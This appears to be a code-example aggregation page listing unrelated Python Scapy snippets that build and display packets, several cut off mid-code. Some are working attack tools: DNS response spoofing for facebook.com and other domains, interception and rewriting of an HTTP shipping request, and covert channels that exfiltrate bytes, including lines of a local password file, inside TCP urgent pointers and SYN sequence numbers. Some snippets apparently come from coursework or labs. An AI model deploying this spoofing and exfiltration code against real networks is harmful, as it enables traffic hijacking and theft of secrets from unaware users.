示例#1
0
def print_and_accept(pkt):
    regex = re.compile("/ex3/shipping")
    pkt.accept()

    ip = IP(pkt.get_payload())

    if ip["TCP"].dport == 80:
    	if ip.haslayer("Raw"):
    		http = ip["Raw"].load.decode()

    		if regex.search(http):
    			print("HTTP:")
    			print(http)
    			print("\nIP.show():")
    			print(ip.show())
    			
    			new_msg = json.loads(http.splitlines()[-1])
    			new_msg["shipping_address"] = "*****@*****.**"
    			
    			ip["Raw"].load = new_msg
    			print("\nIP.show() nr. 2:")
    			print(ip.show())

    			answer = requests.post("http://com402.epfl.ch/hw1/ex3/shipping", data=json.dumps(new_msg), headers={"Content-Type": "application/json"})
    			print("\nAnswer code:")
    			print(answer.status_code)
    			print("\nAnswer text:")
    			print(answer.text)
 def send_data(self, bytestream):
     if self.verbose():
         print("Exfiltrating " + repr(bytestream.decode('us-ascii')))
     packet = IP() / TCP()
     packet.dst = self.host()
     packet.dport = self.dest_port()
     packet.sport = self.source_port()
     packet.getlayer(TCP).flags = 0x20 | 0x02  # URG & SYN
     packet.urgptr = self.int_for(bytestream)
     if self.verbose():
         packet.show()
     send(packet, verbose=self.verbose())
示例#3
0
 def get_response(pkt: IP):
     print("XD")
     if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
         print("XD")
         if page_name in str(pkt["DNS Question Record"].qname):
             spf_resp = IP(dst=pkt[IP].src) / UDP(
                 dport=pkt[UDP].sport, sport=53) / DNS(
                     id=pkt[DNS].id,
                     ancount=1,
                     an=DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) /
                     DNSRR(rrname=page_name, rdata=FAKE_IP))
             spf_resp.show()
             send(spf_resp, verbose=0, iface=IFACE)
             return f"Spoofed DNS Response Sent: {pkt[IP].src}"
示例#4
0
 def modify(packet):
     pkt = IP(packet.get_payload())
     if pkt.qd.qname == b'facebook.com.':
         print(pkt.show())
         p = Ether(
             dst=self.MacList[0], src=self.LocalMac,
             type=2048) / IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP(
                 sport=53, dport=pkt[UDP].sport) / DNS(
                     id=pkt[DNS].id,
                     qr=1,
                     qdcount=1,
                     ancount=1,
                     nscount=0,
                     arcount=0,
                     qd=DNSQR(
                         qname=pkt[DNS].qd.qname, qtype=1, qclass=1),
                     an=DNSRR(rrname=pkt[DNS].qd.qname,
                              type=1,
                              rclass=1,
                              rdata=ip),
                     ns=None,
                     ar=None)
         sendp(p, verbose=0)
         #packet.set_payload(bytes(str(pkt), 'utf-8')) #set the packet content to our modified version
         packet.drop()  #drop the packet
     else:
         packet.accept()
示例#5
0
    def get_response(pkt: IP):
        # First check if it is a
        #  DNS request packet
        if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
            # Init site in banned list
            # to be False.
            site_in_list = False

            # Find out if the site is
            # in the banned list.
            for site in website_list:
                if site in str(pkt["DNS Question Record"].qname):
                    site_in_list = True

            # If the site is in the banned list
            # spoof the packet.
            if site_in_list:

                # Create a spoofed packet
                spf_resp = IP(
                    src=DNS_SERVER_IP, dst=pkt[IP].src) / UDP() / DNS(an=DNSRR(
                        rrname=pkt[DNSQR].qname, ttl=299, rdata='127.0.0.1'))

                # Print for demo purposes
                print(
                    "******************** SITE IN BANNED LIST *****************"
                )
                print(
                    "****************** SPOOFED PACKET BELOW ******************"
                )
                spf_resp.show()

                # Send spoofed packet
                send(spf_resp, verbose=2, iface=IFACE)

                return f"Spoofed DNS Response Sent: {pkt[IP].src}"

            else:
                # Send the real response packet
                return forward_dns(pkt)
示例#6
0
    def send(self, packet):
        original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
        if self.verbose > 1:
            print "Original packet:"
            original_packet.show()
        hexdump(str(original_packet))
       
        fragments = fragment(original_packet, fragsize = self.fragment_size)
        try:
            i = 1
            for frag in fragments:
                if self.verbose > 1:
                    print "Fragment %d of %d:" % (i, len(fragments))
                    frag.show()
                frag = str(frag)
                length = struct.pack(">I", len(frag))

                if not self.sock:
                    print '[+] connecting ...'
                    self.sock = self.create()
                   
                print '[+] sending part %d of %d now..' % (i, len(fragments))
                hexdump(frag)
                if self.log:
                    self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
                self.sock.send(length)
                self.sock.send(frag)
                if self.log:
                    self.log('sent fragment %d of %d' % (i, len(fragments)))
                i += 1
                
                if self.raw_send:

                    if self.log:
                        self.log('forcing a new connection due to raw_send flag')
                    self.close()
               
        except KeyboardInterrupt,e:
            print "[-] keyboard interrupt while connecting/sending to redirector"
            raise KeyboardInterrupt,e
示例#7
0
    def get_response(pkt):
        if (DNS in pkt and pkt[IP].src != DNS_SERVER_IP
                and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
            if 'trailers.apple.com' in str(pkt['DNS Question Record'].qname):
                spoofed = IP(dst=pkt[IP].src)\
                    /UDP(dport=pkt[UDP].sport, sport=53)\
                    /DNS(id=pkt[DNS].id, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP))
                print(spoofed.show())
                send(spoofed, verbose=0)
                return f'Spoofed DNS Response Sent: {spoofed.summary()}'

            else:
                return forward_dns(pkt)
示例#8
0
class IPLayer(object):
    """docstring for IPLayer"""
    """Argument has to a dictionay of python """
    def __init__(self, arguments={}):
        # super(IPLayer, self).__init__()
        self.packet = None
        if not isinstance(arguments, dict): return "Please provide a dictionay"
        self.arguments = arguments

    def make(self):
        self.packet = IP()
        for param in self.arguments:
            if not hasattr(self.packet, param): continue
            setattr(self.packet, param, self.arguments[param])
        return self

    def updatePacket(self, arguments={}):
        if not isinstance(arguments, dict): return "Please provide a dictionay"
        for param in arguments:
            if not hasattr(self.packet, param): continue
            setattr(self.packet, param, arguments[param])

    def getPacket(self):
        return self.packet

    def show(self):
        return self.packet.show()

    def addTCP(self):
        packet = TCPLayer()._getTCP()
        self.packet = self.packet / packet
        return self

    def prependEther(self):
        packet = EtherLayer()._getEther()
        self.packet = packet / self.packet
        return self

    def _getIP():
        return IP()
示例#9
0
import os, sys, struct
from select import select
from scapy.all import IP
from fcntl  import ioctl



f = os.open("/dev/tap0", os.O_RDWR)
try:
    while 1:
        r = select([f],[],[])[0][0]
        if r == f:
            packet = os.read(f, 4000)
            # print len(packet), packet
            ip = IP(packet)
            ip.show()
except KeyboardInterrupt:
    print "Stopped by user."
示例#10
0
#!/usr/bin/python3
# Scapy is a python library that allows us to design, manipulate, intercept and process packets
# Scapy sets header fields by default.
# Have to be root to run this.

from scapy.all import IP, ICMP, sr1, ls

ip_layer = IP(src="192.168.0.1", dst="www.google.com")

#print(ip_layer.show())

icmp_req = ICMP()

# Help to list (ls) details about the layer.
print(ls(ip_layer))
print(ip_layer.show())
print(ip_layer.summary())

print(icmp_req.show())
# Add the layers together with /
packet = ip_layer / icmp_req
#print(packet.show())
received_packet = sr1(packet)

if received_packet:
    print(received_packet.show())
示例#11
0
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1,qd=DNSQR(qname=query_input))

# Print all information.
print ""
print "Information"
print "==========="
print "Source IP     : %s" %source_input
print "Destination IP: %s" %destination_input
print "DNS Query     : %s" %query_input
print ""
print "Package details"
print "==============="
print ""
print i.show()
print ""
print u.show()
print ""
print d.show()
print ""

# Confirmation.
is_ok = raw_input("Is it OK? (Y/n)")

# Send or exit.
if is_ok == "y" or is_ok == "Y" or is_ok == "":
    p = send(i/u/d)
else:
    print "Bye."
l = logging.getLogger("scapy.runtime")
l.setLevel(49)
from scapy.all import send, IP, TCP, ICMP, UDP

wb = load_workbook(filename=os.getcwd() + "/sample.xlsx")
# grab the active worksheet
# sheet = wb.active
sheet = wb['Test']
for row in sheet.rows:
    protocol = row[0].value
    if (protocol == 'ICMP'):
        a = IP(src=row[1].value,
               dst=row[2].value,
               proto=protocolNumber(row[0].value)) / ICMP() / TCP(
                   sport=row[3].value, dport=row[4].value) / "Hello World"
        a.show()
        send(a)
    if (protocol == 'TCP'):
        a = IP(src=row[1].value,
               dst=row[2].value,
               proto=protocolNumber(row[0].value)) / TCP(
                   sport=row[3].value, dport=row[4].value, flags='S',
                   seq=42) / "Hello World"
        a.show()
        send(a)
    if (protocol == 'UDP'):
        a = IP(src=row[1].value,
               dst=row[2].value,
               proto=protocolNumber(row[0].value)) / UDP(
                   sport=row[3].value, dport=row[4].value) / "Hello World"
        a.show()
示例#13
0
import select
import time
from scapy.all import IP, ICMP
from pytun import TunTapDevice, IFF_TAP, IFF_TUN, IFF_NO_PI

tun = TunTapDevice(flags=IFF_TUN | IFF_NO_PI, name="FakePing")
tun.addr = "10.10.10.1"
tun.netmask = '255.255.255.0'
tun.up()

epoll = select.epoll()
epoll.register(tun.fileno(), select.EPOLLIN)

while True:
    while epoll.poll(0):
        data = tun.read(tun.mtu)
        packet = IP(data)

        icmp_part = packet.getlayer(ICMP)
        if icmp_part is not None:
            time.sleep(desire_time)
            respacket = IP(src=packet.dst, dst=packet.src, ttl=desire_ttl)
            respacket /= ICMP(type=0, seq=icmp_part.seq, id=icmp_part.id)
            respacket /= icmp_part.payload
            tun.write(bytes(respacket))

            packet.show()
            respacket.show()

    time.sleep(0.01)
示例#14
0
p=sr(IP(src="192.168.43.55", dst="www.secdev.org")/TCP(sport=RandShort(),dport=[20,21,80,443,3389], flags="S"),inter=0.5,retry=2,timeout=1)
#traceroute
traceroute(["www.google.com"], maxttl=20)
#traceroute con puerto 23
traceroute (["10.1.99.2"],dport=23,maxttl=20)
#paquete por capas
IP()
IP()/TCP()
Ether()/IP()/TCP()
IP()/TCP()/"GET / HTTP/1.1\r\n\r\n"
Ether()/IP(dst="api.tidex.com")/TCP(dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n"
Ether()/IP()/IP()/UDP()

#armado de paquetes por capas
a=Ether(); a.show()
b=IP(); b.show()
c=TCP(); c.show()
d=sr(a/b/c,timeout=2)

#enviar paquete por capas
ans,unans=sr(IP(dst="api.tidex.com")/TCP(sport=RandShort(),dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n")

#############HTTP
##super importante  
#https://stackoverflow.com/questions/9058052/unwanted-rst-tcp-packet-with-scapy
#iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 192.168.43.55 -j DROP
load_layer("http")
req = HTTP()/HTTPRequest(
    Accept_Encoding=b'gzip, deflate',
    Cache_Control=b'no-cache',
    Connection=b'keep-alive',
示例#15
0
#! /usr/bin/env python

from scapy.all import TCP, IP, send
import time

src_naame = '10.0.2.15'  # Enter ip of listener
src_port = 666  # Enter port on which listener iss listening

i = 0
sn = 70

f = open("/home/MadMaxx/Desktop/psswd.txt", 'r')
webs = ['twitter.com', 'google.com', 'reddit.com']

for line in f.readlines():
    for c in line:
        serv = webs[i]
        ip = IP(dst=serv, src=src_naame)
        p = sn * 1000 + ord(c)
        tcp = TCP(sport=src_port, dport=443, flags='S', seq=p)
        send(ip / tcp)
        ip.show()
        tcp.show()
        time.sleep(0.5)
        send(ip / TCP(dport=443, flags='F'))
        sn += 1
        if i + 1 == len(webs):
            i = 0
        else:
            i += 1